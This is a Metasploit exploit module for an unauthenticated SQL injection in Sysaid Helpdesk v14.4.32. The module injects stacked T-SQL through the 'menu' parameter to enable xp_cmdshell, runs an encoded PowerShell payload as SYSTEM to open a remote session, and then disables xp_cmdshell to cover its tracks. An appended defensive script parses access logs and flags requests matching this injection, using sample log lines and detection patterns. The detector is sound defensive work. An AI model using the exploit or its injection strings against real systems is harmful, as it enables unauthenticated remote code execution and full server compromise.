# Exploit Title: Sysaid Helpdesk Software Unauthenticated SQLi
# Date: 28.11.2015
# Exploit Author: hland
# Vendor Homepage: https://www.sysaid.com/
# Version: v14.4.32 b25
# Tested on: Windows 7, Windows 10
# Blog post: http://blog.blankhat.pw/2015/09/unauthenticated-sql-injection-in-sysaid.html

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'
require 'msf/core/exploit/mssql_commands'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Sysaid Helpdesk Software Unauthenticated SQLi",
      'Description'    => %q{
        This module exploits an unauthenticated SQLi vulnerability in the Sysaid
        Helpdesk Free software. Because the "menu" parameter is not handled
        correctly, a malicious user can manipulate the SQL query, and allows
        arbitrary code execution under the context of 'SYSTEM' because the
        database runs as the SA user. This module uses a Metasploit generated
        Powershell payload and uses xp_cmdshell, which is activated and then
        deactivated after exploitation.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Hland' ],
      'References'     => [ ['CVE', 'xxxx'] ],
      'Payload'        => { 'BadChars' => "\x00" },
      'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' },
      'Platform'       => 'win',
      'Targets'        => [ ['Sysaid Helpdesk <= v14.4.32 b25', {}] ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 29 2015",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptPort.new('RPORT', [true, "The web application's port", 8080]),
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
      ], self.class)
  end

  # Fingerprint the target by the <title> of the login page.
  def check
    peer = "#{rhost}:#{rport}"
    uri = normalize_uri(target_uri.path, "Login.jsp")
    print_status("#{peer} - Checking for vulnerability")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => uri,
      'vars_get' => {}
    })

    # String#scan returns an Array, which is always truthy, so the original
    # "if not v" test could never report Safe; test the match directly and
    # also guard against a missing response.
    if res.nil? || res.body !~ /<title>SysAid Help Desk Software<\/title>/
      vprint_error("Is this even a Sysaid Help Desk?")
      return Exploit::CheckCode::Safe
    else
      vprint_status("Identified system as Sysaid Help Desk")
      return Exploit::CheckCode::Appears
    end
  end

  # Helper kept from the original module. Note that it is not called by
  # #exploit and depends on mssql_query from Msf::Exploit::Remote::MSSQL,
  # which is required above but never mixed in.
  def mssql_xpcmdshell(cmd, doprint = false, opts = {})
    force_enable = false
    begin
      res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint)
      #mssql_print_reply(res) if doprint
      return res
    rescue RuntimeError => e
      # Retry once rather than looping forever on the same error.
      if e.to_s =~ /xp_cmdshell disabled/ && !force_enable
        force_enable = true
        retry
      end
      raise e
    end
  end

  def exploit
    peer = "#{rhost}:#{rport}"
    uri = target_uri.path

    vprint_line("#{peer} - Getting a session token...")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(uri, "Login.jsp"),
      'vars_get' => {}
    })

    # Got a cookie, now ready to make exploiting requests
    if res && res.code == 200
      vprint_line("#{peer} - Cookie's in the jar...")
      #vprint_line("#{res.headers}")
      cookies = res.get_cookies
      #vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}")
    else
      vprint_line("No 200 response? I'm outta here")
      return
    end

    # Put together the vulnerable URI
    uri = normalize_uri(uri, "api", "v1", "menu", "menu_items")

    # Generate powershell payload as an encoded string
    powershell_payload = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { :encode_final_payload => true, :remove_comspec => true }
    )

    #
    # Inject payload and wait for shell
    #
    print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability")
    sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--"
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => uri,
      'cookie'   => cookies,
      'vars_get' => { 'menu' => sqli }
    })

    # Deactivate XPCmdShell
    sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--"
    print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => uri,
      'cookie'   => cookies,
      'vars_get' => { 'menu' => sqli }
    })
  end
end
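The module above leaves a very recognisable trace in the web server's access log: an unauthenticated GET to /api/v1/menu/menu_items whose menu parameter carries stacked sp_configure / xp_cmdshell statements, followed by a second request that switches xp_cmdshell off again. The following Ruby script is an added defensive example, not part of hland's module or of Sysaid's software: it parses Common Log Format lines, URL-decodes the menu parameter and flags entries that match that request shape. The log lines are constructed samples; the path and the SQL fragments are taken from the module itself, with the PowerShell payload replaced by a placeholder.

```ruby
# Added example: flag Sysaid access-log entries whose 'menu' parameter
# carries stacked SQL statements. Log lines below are constructed samples.
require 'uri'

VULN_PATH = '/api/v1/menu/menu_items'.freeze

# Markers that a menu value is an injection rather than a plain menu name.
SQLI_MARKERS = [
  /'\s*;/,               # closing quote followed by a statement separator
  /\bsp_configure\b/i,   # toggling server options
  /\bxp_cmdshell\b/i,    # OS command execution from T-SQL
  /\bRECONFIGURE\b/i,
  /--\s*\z/              # trailing comment that discards the original query tail
].freeze

# Parse a Common Log Format line into method, path, query and status.
# Returns nil for lines that do not look like an access-log entry.
def parse_access_log(line)
  m = line.match(/"(?<method>[A-Z]+) (?<target>[^ ]+) HTTP\/[\d.]+" (?<status>\d{3})/)
  return nil unless m
  path, _, query = m[:target].partition('?')
  { method: m[:method], path: path, query: query, status: m[:status].to_i }
end

# URL-decode the query string and return the 'menu' parameter, or nil.
def menu_param(query)
  return nil if query.nil? || query.empty?
  pair = URI.decode_www_form(query).find { |k, _| k == 'menu' }
  pair && pair[1]
end

def suspicious_menu?(value)
  return false if value.nil?
  SQLI_MARKERS.any? { |re| value =~ re }
end

# Return the log lines that hit the vulnerable endpoint with an injected menu value.
def find_sysaid_sqli(lines)
  lines.select do |line|
    rec = parse_access_log(line)
    next false unless rec && rec[:path].end_with?(VULN_PATH)
    suspicious_menu?(menu_param(rec[:query]))
  end
end

# Constructed sample log: a normal login, a benign menu request, then the
# enable/exploit and disable requests as the module would send them.
SAMPLE_LOG = [
  '10.0.0.5 - - [28/Nov/2015:10:00:01 +0000] "GET /Login.jsp HTTP/1.1" 200 5120',
  '10.0.0.5 - - [28/Nov/2015:10:00:02 +0000] "GET /api/v1/menu/menu_items?menu=main HTTP/1.1" 200 812',
  '10.0.0.9 - - [28/Nov/2015:10:00:03 +0000] "GET /api/v1/menu/menu_items?menu=main%27%3Bexec+master.dbo.sp_configure+%27show+advanced+options%27%2C1%3BRECONFIGURE%3Bexec+master.dbo.sp_configure+%27xp_cmdshell%27%2C+1%3BRECONFIGURE%3BEXEC+master..xp_cmdshell+%27PAYLOAD_PLACEHOLDER%27%3B-- HTTP/1.1" 500 0',
  '10.0.0.9 - - [28/Nov/2015:10:00:04 +0000] "GET /api/v1/menu/menu_items?menu=main%27%3Bexec+sp_configure+%27xp_cmdshell%27%2C+0+%3BRECONFIGURE%3B-- HTTP/1.1" 500 0'
].freeze

if __FILE__ == $0
  find_sysaid_sqli(SAMPLE_LOG).each { |l| puts "SUSPICIOUS: #{l}" }
end
```

Because the endpoint needs no session, the absence of a prior successful login from the same client is itself a useful second signal; in the sample above the two flagged requests come from a host that never touched Login.jsp. The same decoded-parameter check can be applied at a reverse proxy or WAF in front of the application while patching is pending.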